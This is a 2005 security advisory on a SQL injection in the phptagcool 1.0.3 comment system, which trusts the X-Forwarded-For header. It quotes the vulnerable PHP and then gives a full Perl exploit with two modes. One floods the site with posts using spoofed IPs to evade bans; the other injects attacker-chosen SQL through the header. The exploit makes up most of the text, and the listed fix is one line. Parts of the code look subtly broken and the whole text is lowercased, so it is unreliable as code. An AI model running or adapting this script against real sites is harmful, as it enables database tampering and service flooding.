#####################################################################

advisory #2 "phptagcool sql injection"

$ author: megabyte
$ contact: megabyte@diosdelared.com megabyte@gobiernofederal.com
mbytesecurity@gmail.com
$ date: aug 24 2005
$ website: http://mbytesecurity.org
$ risk: high
$ vendor url: http://crashcool.com
$ affected software: phptagcool v1.0.3

$greetz pandora te amo bb, rootbox for discovering the forwarded-for issue

#####################################################################

-= description =-

phptagcool is an online tag system for leaving your comments

---------------------------------------------------------------------------

-= vulnerabilities =-

- | "sql inyection" |

the phptagcool software allows to inject sql code spoofing the x-forwarded-for
header

here its the vulnerable portion of the code in post.php

___________________________________________________________________________

#sacar ip
if (isset($_server['http_x_forwarded_for'])) {
$ip = $_server['http_x_forwarded_for'];
} elseif (isset($_server['http_via'])) {
$ip = $_server['http_via'];
}elseif (isset($_server['remote_addr'])) {
$ip = $_server['remote_addr'];
} else {
$ip = "x.x.x.x";
}
#comprobamos si el user esta baneado
#conectamos con la db
$conexion=mysql_connect($host,$usuario,$contrasenya);
#seleccionamos la db
mysql_select_db($base,$conexion);
$consulta2=mysql_query("select * from $t_ban where ip='$ip'"
,$conexion);
____________________________________________________________________________

so if we fake the x-forwarded-for with our own value,instead of the ip address we

can inject sql code

$consulta2=mysql_query("select * from $t_ban where ip='here i can inject'"

,$conexion);

- | exploit |

you can use any man in the middle software to intercept and edit the http headers
such as achilles.
but here its the exploit that allows 2 type of attacks,flood and sql injection

#!/usr/bin/perl
## phptagcool zatueritor 1.0
## copyright: megabyte www.mbytesecurity.org
## greetz: rootbox for discovering the forwarded-for issue
## te amo pandora
## crashcool,fuiste defaceado por un bug de tu propia programacion,ahora que
inventaras?

use io::socket;

$x = 0;

print q(
phptagcool zatueritor 1.0
by megabyte

);
print q(host |sin http://www.| );
$host = <stdin>;
chop ($host);

print q(ruta |ejemplo. /phptagcool/ o /| );

$pth = <stdin>;
chop ($pth);

print q(tipo de atake |1 = posteo masivo, 2 = injeccion sql| );

$type = <stdin>;
chop ($type);

## the flood attack

if($type == 1){

while($x != 255)
{

$nick = "nick=megabyte";

## we generate our own ip address so we won't be banned :)

$ip = "127.0.0" . "$x";

$postit =
"$nick"."&url=http%3a%2f%2fwww.mbytesecurity.org&mensaje=floodinglametag&submit=en
viar";
$lrg = length $postit;

my $sock = new io::socket::inet (

peeraddr => "$host",
peerport => "80",
proto => "tcp",
);
die "\nno se pudo conectar :( $!\n" unless $sock;

## we fake the x-forwarded-for header,so we can post with multiple ip's

print $sock "post $pth"."mensajes.php http/1.1\n";
print $sock "host: $host\n";
print $sock "accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-
powerpoint, application/msword, */*\n";
print $sock "referer: $host\n";
print $sock "accept-language: en-us\n";
print $sock "content-type: application/x-www-form-urlencoded\n";
print $sock "accept-encoding: gzip, deflate\n";
print $sock "user-agent: mozilla/5.0 (beos; u; beos x.6; en-us; rv:1.7.8)
gecko/20050511 firefox/1.0.4\n";
print $sock "x-forwarded-for: $ip\n";
print $sock "connection: keep-alive\n";
print $sock "cache-control: no-cache\n";
print $sock "content-length: $lrg\n\n";
print $sock "$postit\n";
close($sock);

syswrite stdout, ".";

$x++;
}

## the sql injection attack :)

}
elsif ($type == 2){

print q(inyeccion a ejecutar ejemplo |myip,some sql here| );

$sql = <stdin>;
chop ($sql);

my $sock = new io::socket::inet (

peeraddr => "$host",
peerport => "80",
proto => "tcp",
);
die "\nno se pudo conectar :( $!\n" unless $sock;

print $sock "post $pth"."mensajes.php http/1.1\n";

print $sock "host: $host\n";
print $sock "accept:
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,im
age/png,*/*;q=0.5\n";
print $sock "referer: $host\n";
print $sock "accept-language: en-us\n";
print $sock "content-type: application/x-www-form-urlencoded\n";
print $sock "accept-encoding: gzip, deflate\n";
print $sock "user-agent: mozilla/5.0 (beos; u; beos x.6; en-us; rv:1.7.8)
gecko/20050511 firefox/1.0.4\n";
print $sock "connection: keep-alive\n";
print $sock "cache-control: no-cache\n";
print $sock "content-length: $lrg\n\n";
print $sock "x-forwarded-for: $sql\n";
close($sock);

}else{

die "solo hay 2 opciones imbecil\n";

}

------------------------------------------------------

-= how to fix =-

filter the http_x_forwarded_for

-= contact =-
megabyte
http://mbytesecurity.org
el dios de la red
saludos a pandora mi bb
zeus,cairo,redpoint,x0p0x and all lame band